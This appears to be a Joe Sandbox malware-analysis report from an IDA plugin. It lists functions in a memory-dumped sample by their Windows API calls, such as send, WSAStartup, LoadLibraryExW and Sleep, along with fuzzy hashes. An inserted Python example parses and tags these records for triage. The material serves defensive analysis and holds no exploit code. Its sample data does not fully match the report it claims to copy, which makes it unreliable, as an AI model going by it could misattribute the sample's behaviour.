Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: FullNamePath_memmove_wcscat
• String ID:
• API String ID: 257928180-0
• Opcode ID: e7e33c4e26a7f143c5e37cf357e9e5a825e2a189b43611a85d6ea8bb086fc089
• Instruction ID: 5c7e57e99b3a757f9d1a3596bc2ea46d35eaf0e6dffcab60943b9a021e979342
• Opcode Fuzzy Hash: e7e33c4e26a7f143c5e37cf357e9e5a825e2a189b43611a85d6ea8bb086fc089
• Instruction Fuzzy Hash: 7301927195410DAACF04FBA0DC45ADD73F9EF24348F10C1A5AA2ED3190EF709B959BA1
APIs
• send.WS2_32(00000000,?,00000000,00000000), ref: 001C9534
• WSAGetLastError.WS2_32(00000000,?,00000000,00000000), ref: 001C9557
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: ErrorLastsend
• String ID:
• API String ID: 1802528911-0
• Opcode ID: 2a9abaec04e3745da4fe93286c92aa064fc1c39d65d6e96ba4a9fe94c07d2125
• Instruction ID: 774c3c6acb065ab13e13e1a84141071d3c496f6f6b251d8a43460aaa5818954b
• Opcode Fuzzy Hash: 2a9abaec04e3745da4fe93286c92aa064fc1c39d65d6e96ba4a9fe94c07d2125
• Instruction Fuzzy Hash: 9E0184353002009FC714EF24D895F6AB7E9EFA8724F10811EE64A87791CB70EC01CB90
APIs
  • Part of subcall function 0019889E: __getptd_noexit.LIBCMT ref: 0019889E
• __lock_file.LIBCMT ref: 001942B9
  • Part of subcall function 00195A9F: __lock.LIBCMT ref: 00195AC2
• __fclose_nolock.LIBCMT ref: 001942C4
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: __fclose_nolock__getptd_noexit__lock__lock_file
• String ID:
• API String ID: 2800547568-0
• Opcode ID: 5e456021488a393c0227776ee525e2062eb3f4aa303ce8fdd2274eb847904e4a
• Instruction ID: 89a59339dd767a18776f9af486bbb1f17c85e6ed6ee98dc111f610072458da81
• Opcode Fuzzy Hash: 5e456021488a393c0227776ee525e2062eb3f4aa303ce8fdd2274eb847904e4a
• Instruction Fuzzy Hash: B1F0E9318117149BDF25BBB5A806F5E77E17F51334F258209F824AB1C1CB7C99029F55
APIs
• timeGetTime.WINMM ref: 0018F57A
  • Part of subcall function 0017E1F0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0017E279
• Sleep.KERNEL32(00000000), ref: 001E75D3
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: MessagePeekSleepTimetime
• String ID:
• API String ID: 1792118007-0
• Opcode ID: 6819e653c38da8c2dac016813b18de66c90f69a67767616923cb17e752415258
• Instruction ID: 3bdc5b1dc9f4833b72afe7e699bb005774574cda452e592d2aa5bc6971d27089
• Opcode Fuzzy Hash: 6819e653c38da8c2dac016813b18de66c90f69a67767616923cb17e752415258
• Instruction Fuzzy Hash: B9F08C712046149FD314EF69D409BA6BBE9AF68320F00402AF81EC7251DB70A940CBD1
APIs
  • Part of subcall function 001784A6: __swprintf.LIBCMT ref: 001784E5
  • Part of subcall function 001784A6: __itow.LIBCMT ref: 00178519
• __wcsnicmp.LIBCMT ref: 001783C4
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: __itow__swprintf__wcsnicmp
• String ID:
• API String ID: 712828618-0
• Opcode ID: 644cb6cfc36239dde98e496c7c38761c236fa2d777c94794c5dffbcf05f0f947
• Instruction ID: d8dc3850166bb9c33e510ce920945d1762fada77e51aa928feab67d4642a6fa0
• Opcode Fuzzy Hash: 644cb6cfc36239dde98e496c7c38761c236fa2d777c94794c5dffbcf05f0f947
• Instruction Fuzzy Hash: 57F16B71508742AFC705EF18C89196EBBF5FF98314F54891DF88A97221DB30EA05CB92
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9ca599920e64f453315c057626f71e299ebb78824d6afaa63b8979ad9d3f7f0c
• Instruction ID: 2c46bdaa05b04a3775aaf51bea2d5bf3667b7e5d0aeb61e6ebb37a52988139b2
• Opcode Fuzzy Hash: 9ca599920e64f453315c057626f71e299ebb78824d6afaa63b8979ad9d3f7f0c
• Instruction Fuzzy Hash: F761B174A002069FDB14EF54C884ABAF7F4FF28310F108269E91587681EB31EE95CF91
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b6c593fdd9a208465862ec2571085aa0bd0f833798dfddb15cf363781f53116e
• Instruction ID: 5d47b8608fb934dd1e39d47a072fe7a9f6204f65f076ad941c8506afe8fded72
• Opcode Fuzzy Hash: b6c593fdd9a208465862ec2571085aa0bd0f833798dfddb15cf363781f53116e
• Instruction Fuzzy Hash: 3C519235600504AFCF14FFA8C991EAD77FAAF69354B158069F50A9B293DB30EE01DB90
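The function records above are flat report text; to triage a whole report you want them as structured data, and in particular you want to keep a function's own API calls apart from calls the plugin attributes to a "Part of subcall function" callee. The following is an added example, written for this page and not part of the Joe Sandbox report or its IDA plugin: it parses three of the records shown above (copied verbatim as the constructed sample, with the "Associated:" lines omitted), records the subcall attribution, and applies a small tag table. The tag tables (NAME_TAGS, MODULE_TAGS) and the helper names are assumptions of this example, not Joe Sandbox signature logic.

```python
"""Parse Joe Sandbox IDA-plugin function records and tag them for triage (added example)."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample: three records copied from the report above. Record 1 keeps its
# Memory Dump Source block; records 2 and 3 are trimmed to APIs/Similarity.
SAMPLE = """\
APIs
• GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 0017352A
  • Part of subcall function 00177E53: _memmove.LIBCMT ref: 00177EB9
• _wcscat.LIBCMT ref: 001E66C0
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
Similarity
• API ID: FullNamePath_memmove_wcscat
• API String ID: 257928180-0
• Instruction Fuzzy Hash: 7301927195410DAACF04FBA0DC45ADD73F9EF24348F10C1A5AA2ED3190EF709B959BA1
APIs
• send.WS2_32(00000000,?,00000000,00000000), ref: 001C9534
• WSAGetLastError.WS2_32(00000000,?,00000000,00000000), ref: 001C9557
Similarity
• API ID: ErrorLastsend
• API String ID: 1802528911-0
• Instruction Fuzzy Hash: 9E0184353002009FC714EF24D895F6AB7E9EFA8724F10811EE64A87791CB70EC01CB90
APIs
• timeGetTime.WINMM ref: 0018F57A
  • Part of subcall function 0017E1F0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0017E279
• Sleep.KERNEL32(00000000), ref: 001E75D3
Similarity
• API ID: MessagePeekSleepTimetime
• API String ID: 1792118007-0
• Instruction Fuzzy Hash: B9F08C712046149FD314EF69D409BA6BBE9AF68320F00402AF81EC7251DB70A940CBD1
"""

SECTIONS = {"APIs", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\([^)]*\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)
FIELD_LINE = re.compile(r"^\s*•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")

# Assumed triage tags for this example, not Joe Sandbox's own signature logic.
NAME_TAGS = {"Sleep": "timing", "timeGetTime": "timing",
             "PeekMessageW": "message-pump", "GetFullPathNameW": "path"}
MODULE_TAGS = {"WS2_32": "network", "WINMM": "timing"}

@dataclass
class ApiCall:
    name: str
    module: str
    ref: str                       # address of the call site
    subcall_of: str | None = None  # set when a callee, not this function, makes the call

@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    fields: dict[str, str] = field(default_factory=dict)

def parse_records(text: str) -> list[FunctionRecord]:
    """Split the flat report text into one FunctionRecord per function."""
    records, cur, section = [], FunctionRecord(), None
    for line in text.splitlines():
        if line.strip() in SECTIONS:
            section = line.strip()
            continue
        if section == "APIs":
            m = API_LINE.match(line)
            if m:
                cur.apis.append(ApiCall(m["name"], m["module"], m["ref"], m["sub"]))
            continue
        m = FIELD_LINE.match(line)
        if m and section:
            key = m["key"].strip()
            cur.fields[key] = m["val"].strip()
            if key == "Instruction Fuzzy Hash":  # last field of every record
                records.append(cur)
                cur = FunctionRecord()
    return records

def tag_record(rec: FunctionRecord) -> set[str]:
    """Coarse behavioural tags from every API a record touches, subcalls included."""
    tags = set()
    for c in rec.apis:
        if c.name in NAME_TAGS:
            tags.add(NAME_TAGS[c.name])
        elif c.module in MODULE_TAGS:
            tags.add(MODULE_TAGS[c.module])
    return tags

def direct_callers(records: list[FunctionRecord], api: str) -> list[str]:
    """API String IDs of records whose own code (not a subcall) calls `api`."""
    return [r.fields.get("API String ID", "") for r in records
            if any(c.name == api and c.subcall_of is None for c in r.apis)]
```

direct_callers is the check worth keeping: in the timeGetTime/Sleep record PeekMessageW appears only through a subcall, so a rule written as "function calls PeekMessageW" would fire on that function unless the subcall attribution is honoured, while tag_record deliberately folds subcalls in for a coarser behavioural view.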
                                                                                                                              APIs
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
APIs
• SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00174F8F
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
APIs
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: select
• String ID:
• API String ID: 1274211008-0
APIs
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
APIs
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
APIs
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
APIs
  • Part of subcall function 00173F5D: FreeLibrary.KERNEL32(00000000,?), ref: 00173F90
• LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,001734E2,?,00000001), ref: 00173FCD
  • Part of subcall function 00173E78: FreeLibrary.KERNEL32(00000000), ref: 00173EAB
  • Part of subcall function 00174010: _memmove.LIBCMT ref: 0017405A
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: Library$Free$Load_memmove
• String ID:
• API String ID: 3640140200-0
APIs
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: LibraryLoad
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1029625771-0
                                                                                                                              APIs
                                                                                                                              • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,00000000,00000000,?,00174E69,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00174CF7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileRead
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2738559852-0
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _memmove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4104443479-0
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _memmove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4104443479-0
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _memmove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4104443479-0
                                                                                                                              APIs
                                                                                                                              • CharUpperBuffW.USER32(00000000,?,00000000,?,?,?,00175A39,?,?,?,-00000003,00000000,00000000), ref: 0017514E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: BuffCharUpper
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3964851224-0
                                                                                                                              APIs
                                                                                                                              • WSAStartup.WS2_32(00000202,?), ref: 001C95C9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Startup
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 724789610-0
                                                                                                                              APIs
                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,?,?,001734E2,?,00000001), ref: 00173E6D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeLibrary
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3664257935-0
                                                                                                                              • Opcode ID: 9ca78eb3e3bbf051be0d2f326b4252661689a794cccd3a161fa712ce5d98971b
                                                                                                                              • Instruction ID: 28f0a30b085af2fc252d24c75908aa85dcce13c17354f88cb2dfae05f86957ab
                                                                                                                              • Opcode Fuzzy Hash: 9ca78eb3e3bbf051be0d2f326b4252661689a794cccd3a161fa712ce5d98971b
                                                                                                                              • Instruction Fuzzy Hash: 8FF03971105751CFCB389F64E890826BBF1BF14715324CA3EE1EA82621DB31A944EF00
                                                                                                                              APIs
                                                                                                                              • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?), ref: 001B7A11
                                                                                                                                • Part of subcall function 00177E53: _memmove.LIBCMT ref: 00177EB9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FolderPath_memmove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3334745507-0
                                                                                                                              • Opcode ID: 3aa5ab2f190c0fec7de7fffbc8c57035b2b04ae3d5957af36cceeea2b8e08d49
                                                                                                                              • Instruction ID: 636ee4e75b89393a45a6f1e25c37e6ea30cfbbb8ce3107dddab943d4d1136afa
                                                                                                                              • Opcode Fuzzy Hash: 3aa5ab2f190c0fec7de7fffbc8c57035b2b04ae3d5957af36cceeea2b8e08d49
                                                                                                                              • Instruction Fuzzy Hash: 74D05EA65002282FDB50E6249C0ADFB36ADC744104F0042A0786DD2042EA20AE8586E0
                                                                                                                              APIs
                                                                                                                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00171952
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSendTimeout
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1599653421-0
                                                                                                                              • Opcode ID: e2281060d467d83200060d0fb3b6a3ae6455fcc2474ea2ad00ddcc0cb6c57e69
                                                                                                                              • Instruction ID: 3a9bb49c4de5a7a4fb8f0ab17075257bbef0e1a4e9c1e2efb2b146ae8feb1591
                                                                                                                              • Opcode Fuzzy Hash: e2281060d467d83200060d0fb3b6a3ae6455fcc2474ea2ad00ddcc0cb6c57e69
                                                                                                                              • Instruction Fuzzy Hash: 62D012F16902087EFB008761DD07EBB775CD721F81F4046617E06D64D1D6649E498570
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0017193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00171952
                                                                                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 001AE3AA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$Timeout
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1777923405-0
                                                                                                                              • Opcode ID: b41cf61fa66fa5029ef341ad9564600555ba719cacfb9fbc057aef56b75c42c6
                                                                                                                              • Instruction ID: e39a6502fdbb69368e95be104dd10aff35d16897644d941c81ea92d0a9568899
                                                                                                                              • Opcode Fuzzy Hash: b41cf61fa66fa5029ef341ad9564600555ba719cacfb9fbc057aef56b75c42c6
                                                                                                                              • Instruction Fuzzy Hash: 0ED01235144110AAFE706B18FC06FD577A29F41750F114459F580AB0E5C7D25C819540
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
